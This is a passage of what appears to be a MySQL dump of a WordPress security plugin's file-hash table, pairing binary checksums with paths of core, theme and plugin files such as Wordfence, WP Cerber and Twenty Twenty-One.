Z�C��{-�E�-���o�%����I#�','',0,'?'),('W7��{(��;:P���?','wp-admin/includes/class-bulk-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A2�?������+Y��','�i���;�M3�U�P�<�XZ��z����','',0,'?'),('X��H奥(�:�Z�','wp-admin/admin-ajax.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�Iys��j�y��Ѩ_','8=Ի�(���H��&�uE\Zl}RZ��>Ol�x','',0,'?'),('\\d���;�ѳbI%@��','wp-content/plugins/wp-cerber/assets/flags/dk.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���K\n�l����7D!','%���w����r6�U^�/1���6�a��\'<b�B','',0,'?'),('^��� �lkB��K�','wp-content/plugins/wp-cerber/assets/flags/vg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����C�XBJ��\'2','`���G�a\02��%̛7�\\H�=gs�%��','',0,'?'),('a5�ͅB�_��s�','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_classmap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�EӤ㭇��M��g��','Q��*\'���B�+E��ߞ��:��m��yu�W','',0,'?'),('go�s�V�;���\n$','wp-includes/js/tinymce/plugins/compat3x/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�n���1����oVb','C���T�(��N+�,��TN�C����`ީ���','',0,'?'),('�h�r\Z����;%e�-x','wp-content/plugins/wordfence/css/images/ui-icons_444444_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G�J��u;Q�Z6��','����\\MU��KhQ�w�C��i�V���J\'','',0,'?'),('�����U��)��ʀ3G','wp-content/plugins/akismet/changelog.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u(Y�kR��S�','�%O�N+�84Nm�[�ւ���/f�wc���)\0p��','',0,'?'),('Ö���vh���l��P','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=��ZobS\ng5����','\n�)�^��	����`-��/��3{):?�','',0,'?'),('� ��C�Y���','wp-includes/pomo/entry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�w3aAr���6VH%�2','%���(\'��Q�[����y�B��	�O4AO7','',0,'?'),('�>�M�8� ٵ��|','wp-includes/images/crystal/archive.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S����I0An�','L��%X����O�+��Aa�!�S�\\܉�&���','',0,'?'),('�ihOP[����f','wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-rename-login-feature.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����B�^.Q�iI�','Cc�qa\0>�I�1����?^����_7�c','',0,'?'),('�Hd�����o�CZ','wp-includes/sitemaps/class-wp-sitemaps-index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&a���1��5b}1','�kZ���`��*5Yu�…�WB�-4Y?�{̯�','',0,'?'),('��\"\rJ\04��\'i�','wp-admin/js/password-strength-meter.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʃ�D����)�a�n','`��)C�E�L�d�X\\�&F-�V7�+1�SA','',0,'?'),('N;s���� Eo�)�','wp-content/themes/magazine-hoot/template-parts/loop-meta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x\n���:�>�rb���','�J	`l�D�h��n����ޅ(C�]�u3�D�\'','',0,'?'),('�C���C*�v�\0�_\0','wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-customize-color-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��1ɪ�[�v����Y�','m5oA��K<�f�X]�zu,#	��3�s�ߵ','',0,'?'),('4�}T�k�D\'W','wp-content/plugins/wp-cerber/assets/rateit.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)3U�d�/��{\ZK3E�','�,-3�\"�a��~����P�c���8�F��M','',0,'?'),('7kq������g>((','wp-content/themes/twentytwentyone/assets/css/print.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/%�5P�,`[�@6','�WEٺǎδU���mU�V��\r��O���z��','',0,'?'),('Vn�`�G�}>a\\','wp-includes/block-patterns/text-two-columns-with-images.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@���N o�F\0�A\n','cUȫd4�B�nD����Q��n+R��J1e','',0,'?'),('\\�����AV*籿','wp-includes/js/jquery/ui/slider.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%��ҏ��9�4g��','/\0�ȷ�s�d�Z�Ʈ�6����[�-\ZM ?u','',0,'?'),('e������~Ь9�','wp-content/themes/twentytwenty/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~�4�a{|��r�K)l','p3\\Ll#J��Cv�\n6j�n���Նs�i�_�','',0,'?'),('�c��nx�Ժ|�','wp-includes/class-walker-category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')��2�G�E����;H�','GJ8������Y<1Q{<�5�C���[�V��z','',0,'?'),('�����n��Nd','wp-includes/js/hoverintent-js.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' p��.`�u76��?','Y!�:\nA��ː	��ګ�Zg�,=�|����','',0,'?'),('�]�*�.>`E��f�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�F���h�瀁1-�','6!o�m��ݎ^�.�^@˨��v7�	I�}��','',0,'?'),('�ݡ=��Nx��K�`*','wp-content/plugins/wordfence/lib/wordfenceClass.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t��R������\\��','j��� �����=��$W�^�P�i�Z��\"','',0,'?'),('�sc�Ev��O8�','wp-content/themes/twentynineteen/sass/media/_captions.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'^�_��_]E�M\'so','�����-L���n�@A��!��@����f��','',0,'?'),('��d��=��@hs�:k}','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/AuthenticationException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K#lJP��e0u�g�۔�','U�WM����slL����9#Tb�Wj?\\�u���','',0,'?'),('�rJ�<p>����Z�','wp-content/plugins/wordfence/views/scanner/issue-wfThemeUpgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7����*J\0���\0�','�7�C�:r�xe��BM�����sx8�d;�+','',0,'?'),('�&/�db�d�q�2/','wp-admin/includes/class-wp-community-events.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b��nu�_�hY&\'V[','B{�\r_�أ���M\'��\n~6)���+��᠘','',0,'?'),('�%w45�X��泞','wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/base2n.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t��^I\'�]!�����','��Ǧ�bt�5��f�����c��kd��m','',0,'?'),('\0��]�a�v���CY','wp-includes/class-wp-walker.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z�+@,�G,��S^�y�','�(8j�C[-��1�Ơ��ʖ��l3Om�','',0,'?'),('�?H�����h�D0	','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/php72compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ﬨ�rz���d�','�h���+�][e+�h�ӆ��FY� V','',0,'?'),('���NVԱ��z�Z','wp-includes/js/jquery/ui/effect-shake.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�̎�X�!��-�U��','�.��,�e=~[�Y�p�x�\"��o�?v��#��','',0,'?'),('ǭ���kOl 9ڇ�J','wp-content/themes/twentytwentyone/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�uH�+-x���i��k�','�!}�@�,Ж@���9�ڏ+��+{�4�4@7��','',0,'?'),(')��_�J�����','wp-includes/js/media-models.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�wɊ��Ur���c[2','�Q�疁�n�s;�;��Z�<☱4K;~{','',0,'?'),('Fnʹ=8�_�?�F�','wp-content/plugins/wp-cerber/assets/flags/lt.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z���\0��H�b–�','�l�w��L+�u�Ţ�U��J&�������','',0,'?'),('G<7e�t�/�W�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[f0L�ş��\r�{VW�','��\'&ܔ[m`�ϊ�c2E��%�W�GW�䉷','',0,'?'),('L}b&�۵�b','wp-includes/blocks/separator/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L��Tz�g�\'†U�c','�����굗�Ij��2%]��\\&q��Jw\\�','',0,'?'),('Wd�l��\09?��i���','wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-dark-mode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}��-���5��_a�_','!Pz4Y-C�i�Yk��-\0���nb:���a�[','',0,'?'),('`�&��锥~K3/d','wp-admin/css/login.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�\"b\"�%X=&���','�2��U+҆�5�~�=�=FL�A�ʯ�,S��','',0,'?'),('�\'ѯ�H��o3kVX','wp-content/plugins/wp-cerber/assets/flags/to.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9��Un��ze��','^�7��\r)���KFd��FG6B�����(\0_*','',0,'?'),('���ґ-���\r�{,�','wp-content/plugins/wordfence/lib/wfCache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7 ƿ����s�y��','|�uIP�wh5ڎ.m\"*n_�� 9����J�P�','',0,'?'),('�~��L��*�,�<:�','wp-admin/includes/theme-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�lp�Bd����Z�','�O� �n�uO\nd�7K[\"}��7\'p���`��`','',0,'?'),('�Sx��4�@o�w�N','wp-admin/js/widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`k<,��j3�eE4��','��m����N��Dڽ��a�\r��q���1�i�[+','',0,'?'),('�[�q�1���N_��','wp-content/themes/magazine-hoot/include/admin/images/slider-width-boxed.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3��$(ƨ��\reP	','�e},g\"�,�co.���p-n#b\r�^�bK��T','',0,'?'),('���:m��[ݢ�:#','wp-includes/l10n.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���(��C�h���#','�Ǹ�9�1Y�����5$�?,=�M�2.��r�','',0,'?'),('�I��\\j���x���g','wp-admin/images/date-button-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','‹?���a�0��9JQ\Z�','���*�Q����_(G:*��ηd������.','',0,'?'),('�]P�JQƀ6o֢��;','wp-includes/Requests/Exception/HTTP/428.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���i�B��}�^�t*','C�O�W%���tߏ�Y�|��&�0�VŒ�\\�','',0,'?'),('���j7r[�,��Z��','wp-admin/upgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5�,/����L�;�','��kNIM\0���ڿX\Z��S��ŁԾ��W�','',0,'?'),('4��B�\07qoB�o6�','wp-includes/blocks/rss.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z<!�U�n��_�eQB','Pn�2���&�Y!�>P�ٙ�{�q61����p','',0,'?'),('\Z��lm��@��','wp-includes/customize/class-wp-customize-date-time-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(��ch�L��F�3�b','�!V���#|��:�{Ǎ.a����(�[y�O%','',0,'?'),('�-��\'g���P�\\�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�V�#ҹ���4�','Gp�f��Hv����\Z��x�8����1C�[�4A','',0,'?'),('���}��>�|��I','wp-content/themes/twentynineteen/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����?����/��L��','v��b3샪k\n!{;�]��\\�;~=J�8����','',0,'?'),('D�8hFޛBViR�','wp-admin/css/colors/blue/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�]Nt�f��B}o	]','�q�̿��j�d���eo\n�%�;�����','',0,'?'),('L,\Z\"�\0C�ʡ8y�','wp-includes/js/dist/primitives.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>�1��~�i!�EKHK/','�S�R�8P���oa:@c���E~�|�Ji�','',0,'?'),('j׻���q.�*;��2','wp-admin/css/colors/sunrise/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�#���o\"x��<�','��i�!��\'��j�T+d�Q��B�K�D@h4�G','',0,'?'),('w�es��i<�O�J%�','wp-includes/rest-api/endpoints/class-wp-rest-themes-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	~��ZJ�yΧ�%���','�hH��M����7�m��\'iB�@�>�','',0,'?'),('�Ը��%\ZD�y�Z','wp-content/plugins/wordfence/lib/GeoLite2-Country.mmdb',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z�$u�e|)�\'aD�k�','�cA���P/Ɖ���wޝʐ#ۋ�\\�`','',0,'?'),('�Z��d*��Y��ژ�','wp-content/plugins/wordfence/views/options/block-all-options-controls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5f����Җ�Ph�','�K;��C��l]�?`w9�0����CmĂ�N�','',0,'?'),('�ӎA}ҎWZ5=*t�','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/RequestFactory.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b;v\'�g��~����k','m�!�M��J\"v�>,���0�\0՜ɫ� &jِ�','',0,'?'),('�*��k�um1=-���','wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-comments/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IW B���>ToR��J','8ȼ�?$[�g1N4}��{�Y�K�J�$��C90','',0,'?'),('�r�W�3���᥾V','wp-admin/css/color-picker-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�p�ES���c�V','�<�=\0�[Z\n2|닢��\0?6������������','',0,'?'),(':�X��2�M��~��','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���2�4vLhN�!��2|','���3iA(���p���GD��ڔ����','',0,'?'),('C�y��8�\'a���','wp-content/plugins/wordfence/crypto/vendor/composer/InstalledVersions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0mj���Ԟ�W','�͛=��ېI�hK�g\0��%T.��]��\r��~','',0,'?'),('L���8��\\�ݼ+','wp-admin/images/imgedit-icons-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',��\'��6U�������t','�?�؎)�.l�����%�<�(�_� 6�`^c7','',0,'?'),('Y�U��h|kU$��;˜','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-quote.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��DZc�ժ�h�Ǘ�','x\n��	�sd��26*�P�ꫡ�f�t��45�bz','',0,'?'),('m�ñ�~���R�?','wp-content/plugins/wordfence/views/tools/options-group-2fa.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�!�aJ:e��c�','3|h|��Kqh�{� \r7��kH��\\�~e�l-�','',0,'?'),('p۞�2N<:Z�7�r�','wp-includes/js/tw-sack.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��������9>���','{�n]�\0ֈ��n�\r����<�w˷X)���:','',0,'?'),('u�)8FG9�C�(���','wp-includes/js/wp-ajax-response.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/pM]�{\"@���s�:l�','�B�HQW�2����a��w��C���- Y��','',0,'?'),('�eBU\\k�h�tK_�6*','wp-includes/blocks/subhead/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�L[� ���3�','��DX�+C�]�D�$W+�f��yi><�\\�4��','',0,'?'),('����9�~\0{@���','wp-content/plugins/wordfence/views/scanner/site-cleaning-beta-sigs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i����oAP��=a�','9s����Z��D×e}���vu�O���','',0,'?'),('�u�t�� ��ɪ��','wp-content/plugins/wp-cerber/assets/flags/es.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ݵ�*M,M\'A@��K�','�򐈄c`M�Cu��6�ם)X�%|G�W��ִ�>','',0,'?'),('���Clo�������','wp-admin/nav-menus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Q�g��>h}7�%<','4��ץk-%���	k@1��Rר�r�ÛN�','',0,'?'),('�&�	Y�tz(�\Z��','wp-content/plugins/wordfence/modules/login-security/classes/controller/totp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j.\\�0*���	[����','f���8��\'!�RF���L���˙^�w��','',0,'?'),('��I<���U�CMdZ�','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-boolean-switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m\nA�I�g��+��.','5�N叜p�o\'�GYNsC�IS��>LJ�','',0,'?'),('��-��i>bs��1�','wp-includes/js/jquery/ui/resizable.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c0�N^�l�����L��','�~��i�{Q���ԯ��֕���YdF�w\r,�Ϲ','',0,'?'),('�g)6d�/���{','wp-content/themes/magazine-hoot/hybrid/js/customize-preview.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�rM�u]��7ߪP','Z�a��c�!SDK���i�D:�\\��qw�l��\\','',0,'?'),('\'Y���֖�>v�ǡ','wp-content/plugins/wp-cerber/assets/flags/td.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'��б�n�HБ�����','��rJ���VO>\Z~dƨn`ik\Z����\\','',0,'?'),('9�L�/gJ�)3','wp-content/plugins/wp-cerber/assets/flags/bt.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6�@^؟J�H;��2:','	��\'��A-��êu��rdƹ��Q����','',0,'?'),('@������4����@�:','wp-content/themes/twentytwenty/template-parts/content-cover.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���oh7��\\�+�','�ea::����8�Af�����J�;��Ak\n','',0,'?'),('m��D�ڜ�(�\r���','wp-content/themes/twentytwentyone/assets/sass/05-blocks/pullquote/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3R��d#\r\"���%','��ݩF�s�3G����b�8������N�@��X','',0,'?'),('��4r�%����j���','wp-includes/SimplePie/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�~Hwb�x��xsٷ:�','0���sD���;��P�=�\'��2�	��\0Df��','',0,'?'),('��KS+�e׎A�@��','wp-admin/css/colors/light/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')��Y�Hn	T��5^�','��Y�y�7B۩���/�c�಻�$r��&���Z','',0,'?'),('�����Fe�	57[�','wp-content/plugins/wordfence/lib/email_newIssues.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q��3岛�u�`�At','m)Th�)�\"=>�#a���Z;V<\0`�h	�5�w','',0,'?'),('����UNEA�g�t','wp-includes/js/customize-selective-refresh.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�uP岉�0x\Z�����','��q�˖jZC~����<sħ+�RI!�H��','',0,'?'),('�A�o�!�V��ų`v','wp-content/wflogs/ips.php',0,'lC�db��.�˴�v','lC�db��.�˴�v','Z][W��P�}�,������7*�q��\n��Ƒ��','',0,'?'),('��l�Uy:e4�N1ϻo','wp-content/themes/twentytwentyone/assets/sass/05-blocks/verse/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]/�\0��7��(r��^','8U���GS�����5���l��rx���\\)��\n','',0,'?'),(' o��ƕ��t_��\0.�','wp-content/plugins/wordfence/views/options/option-switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ص���k�:]����','I���p��A�B�i���7��0rME�$}�y�','',0,'?'),('%~WN82��Q�O���','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Domain.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n4�F��0JC� n��k','�Cb,���\"�\">j���Ŋ��AlD�','',0,'?'),('W�b�ELn���ݖ�','wp-content/themes/magazine-hoot/hybrid/extend/css/webfonts/fa-brands-400.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���e�n살�J|3��D','mY[\"W̷Fc_�Q��K���q��t��k�x','',0,'?'),('\\���\Z�e	�)��Up','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ȑH�\Zb�>V�D��R2','rћJԑI/�\nO�Y}�x��ņ����U ','',0,'?'),('w���+\0���2�R','wp-includes/sodium_compat/src/Core32/SecretStream/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Zjo�\0��y,�*�}c','2p\"Wj����s�lf&S@�[�\\��\"W�','',0,'?'),('��4��t!��BŌ��,','wp-content/plugins/wordfence/js/wfglobal.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0>q� �	^�&�4r�&','���V�\"��_���+�J\0��_���>�J�','',0,'?'),('�-��B��|tS^�','wp-includes/customize/class-wp-customize-nav-menu-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ԡ�P�\n}�$','�vG~?t7\0��h�R,��|�]9��p�.J�w','',0,'?'),('�ECW��`�`��-�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/.php_cs',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_@�e���3�b��B','�L�ؤ@J�9OhG�@@��Z!��\08#l�(','',0,'?'),('�t��d!b΢��ɪ�','wp-content/plugins/wp-cerber/assets/flags/tv.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JP��ށ��߼J�','۽����ɇR�ZN��P����bX�c9h;��','',0,'?'),('΢�S˪�\n��B�V\"','wp-includes/fonts/dashicons.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_�3$_�n��5��X',';ʐ\'8�4aOoY8-U�62���K�qq�$B�x','',0,'?'),('��\\��h\Z��)Ġ�','wp-includes/blocks/paragraph/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A�T;��_Bjf�����','�Ƈ4pc���[<3iԁv�D������How<','',0,'?'),('�*Q.	�-c�%�D','wp-content/plugins/wordfence/lib/flags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i��c�磭��c�-','8�Y��CO���0�j{�\Zx��D�Ė��x�O�','',0,'?'),('��ܡ9�u_\\\n�9�\'','wp-admin/css/color-picker.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���x��Ti6���','ۣq��T��zu���Oi�\\�5ЯY�u��~=c','',0,'?'),('�KU�g0MU�/��ʇ','wp-admin/admin-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Xo��_���Բ)\n��r','�(�Z!.�e��TU92;�����ݏt5o�^','',0,'?'),('\Z[�`��0CI$T��\'�','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)�H��$I�3��^0','Dsmr?v�jz����Mo�3=b0���K�R#','',0,'?'),('4;V��\'�/����f�','wp-includes/js/jquery/ui/effect-scale.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��KaJ�d���J\'^','_��q�x#�_�\0��<�J�c��~�ұ�ǫ','',0,'?'),('7���OW\n@�a','wp-admin/css/colors/modern/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&D��	�?G*��c��','�����w����V�e��am��x��Z�}\"6B','',0,'?'),(':�f�?bj���.���','wp-content/plugins/wordfence/views/blocking/block-list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j?G\\��g��2.&`�p9','F��	��!�\ZB�q�ecC�u�]��P\0ŀ�;�','',0,'?'),(';�{���k���s��','wp-content/themes/twentytwenty/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~gfDA��K��.��M','��h��ڮ�n�?��U��`/3ܙ=�^��','',0,'?'),('T�Ę5VH���P{��','wp-includes/Requests/Exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����\0��3�\Z�RI','-@��g %�����uON\\}@l���f\'���','',0,'?'),('��jo����8D��k','wp-content/plugins/wp-cerber/assets/flags/tz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�0���1�_NM','��_i`K�@D4���=�Z�2QcuY!z�=����','',0,'?'),('��q��YG�%����B','wp-content/themes/twentytwentyone/assets/sass/02-tools/mixins.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','UM��	0��;^=M','���،�@C�B+��=\Z���������','',0,'?'),('���C\n���U���','wp-admin/js/custom-header.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݎ�\Z���\Zڸ���','��v�N����;d�V��5d���t�,�','',0,'?'),('�n��O.���}','wp-content/themes/twentytwenty/templates/template-cover.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V�R��w�O��,�|�','��\r���:�{Yh��\0�o\ni#�uޡh�s���tr','',0,'?'),('��0l��j�0+%�','wp-includes/SimplePie/Source.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a��A:�$]B-�vw�)','�\"���9M�a���U�_�h�I��>�,]�C�','',0,'?'),('���窒�u��\rZJW+','wp-content/plugins/wordfence/images/help.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$N�;\'��M��� Y','���\Z�7\0��r€/i��z;ki,�=L�Z�g���','',0,'?'),('�)����t\r�,�Jڼ','wp-admin/options-permalink.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}�\0�+���qQ=�m','Wsf.̢)\nP��_(�%�Z|��EV�t\rx��','',0,'?'),('�?DŽ����:\n��X','wp-includes/customize/class-wp-customize-theme-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	�K���WTՂ�c�','�&�^��J�eFX*i-t��;��8��t�\0O��','',0,'?'),('��g�<)��t.F��','wp-content/plugins/wp-cerber/assets/flags/aw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�g�qAŎ�RAj�?&v','J	�M��wPs���0)n����F����b��','',0,'?'),('\Z��) �%iy�δ','wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}+#z,��e�rEJ-','sf��q@��8�!yW�&ڔA�+/�uY���44�G','',0,'?'),('\Z�K��a�2Sc��kI','wp-content/plugins/wp-cerber/assets/flags/za.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��	֨���˅hq�d�','s��Δ��֫V��`��`�R	;��cϯ���','',0,'?'),('3�d����yj�����V','wp-content/plugins/wordfence/lib/menu_firewall_blocking.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',��fݎ;��#T��','�>�:�T���O��;���w_S�ݯ��&','',0,'?'),('Wl��y:�\0Vn`�d\0�','wp-includes/js/tinymce/plugins/wpview/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&���\rb���!���',',�`i�t���ڎ�Tm��l��k�s�\r=','',0,'?'),('~V^�5{��F\Z�','wp-content/themes/magazine-hoot/include/admin/widget-announce.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"�����FW��� ','���)��Mܘ�>99\"�(��^��Y��R��','',0,'?'),('�,�4#��(�#','wp-signup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�*�\ra�*5�z�?�','��XjR�|%��Vs��j	